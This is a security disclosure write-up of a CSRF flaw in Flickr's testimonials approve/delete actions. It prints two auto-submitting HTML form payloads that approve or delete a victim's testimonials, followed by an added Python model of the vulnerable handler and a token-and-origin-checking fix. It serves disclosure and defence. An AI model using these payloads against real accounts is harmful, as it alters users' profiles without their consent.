Write whatever you want in others' “Flickr” profile


Hello, did you hear about the testimonials feature in Flickr? .. mmmmm maybe 🙂

Overview:

Simply put, the testimonials function gives you the ability to write testimonials/comments about a Flickr user; he then approves them for display on his profile page, or he can delete them (in case he didn’t like it ^_^).

What we have here:

We have a CSRF vulnerability in the testimonials Approve/Delete actions. The impact: an attacker can use this CSRF vulnerability to approve or delete a user's testimonials, because the request carries no “magic_cookie”, the token that protects against CSRF in Flickr.

POC/Steps:

1. Write a testimonial for any account from here: “https://www.flickr.com/testimonials_write.gne?id=[UserID]” (change [UserID] in the link to the victim's ID).

2. The victim must approve the testimonial before it is displayed on his profile page. The following CSRF payload performs that action (change the testimonial ID):

<html>
<body onload="D1.submit();">
<form id="D1" action="https://www.flickr.com/testimonials_manage.gne" method="POST">
<input type="hidden" name="approve_72157648695059941" value="APPROVE" />
</form>
</body>
</html>

3. Send the payload to the victim. When he opens it, just check his profile page and you will find what you wrote in step 1.

4. To delete a testimonial, the following CSRF payload does it (change the testimonial ID):

<html>
<body onload="D1.submit();">
<form id="D1" action="https://www.flickr.com/testimonials_manage.gne" method="POST">
<input type="hidden" name="delete_72157648695059941" value="DELETE" />
</form>
</body>
</html>
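As an added example (not the author's or Flickr's code), here is a minimal Python model of the testimonials_manage.gne handler: the vulnerable version acts on the approve_<id>/delete_<id> fields with nothing but the session cookie, while the hardened version refuses the request unless the form also carries the session's own magic_cookie token and, when the browser sends an Origin header, that origin is the site itself. The session and testimonial stores and the https://attacker.example origin are constructed for the demonstration.

```python
import hmac
import secrets

SITE_ORIGIN = "https://www.flickr.com"


def new_session():
    """Constructed session record holding the per-session anti-CSRF token
    (the value Flickr carries in the magic_cookie form field)."""
    return {"magic_cookie": secrets.token_hex(16)}


def parse_action(form):
    """Map approve_<id>=APPROVE / delete_<id>=DELETE fields to (action, id)."""
    for name, value in form.items():
        for prefix in ("approve_", "delete_"):
            if name.startswith(prefix) and value == prefix[:-1].upper():
                return prefix[:-1], name[len(prefix):]
    return None, None


def manage_vulnerable(store, session, form):
    """The flaw described above: a valid session cookie (implied by `session`)
    is all that authorises the state change, so a cross-site form works."""
    action, tid = parse_action(form)
    if action is None or tid not in store:
        return 400
    store[tid] = "approved" if action == "approve" else "deleted"
    return 200


def manage_hardened(store, session, form, origin=None):
    """Same endpoint with two independent CSRF checks before any state change."""
    # 1. If the browser sent an Origin header, it must be our own site;
    #    a form auto-submitted from another page carries that page's origin.
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    # 2. The form must carry this session's token (a cross-site page cannot
    #    read it); compare in constant time and encode so non-ASCII input
    #    cannot make compare_digest raise.
    supplied = form.get("magic_cookie", "")
    expected = session["magic_cookie"]
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403
    return manage_vulnerable(store, session, form)
```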


POC Video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com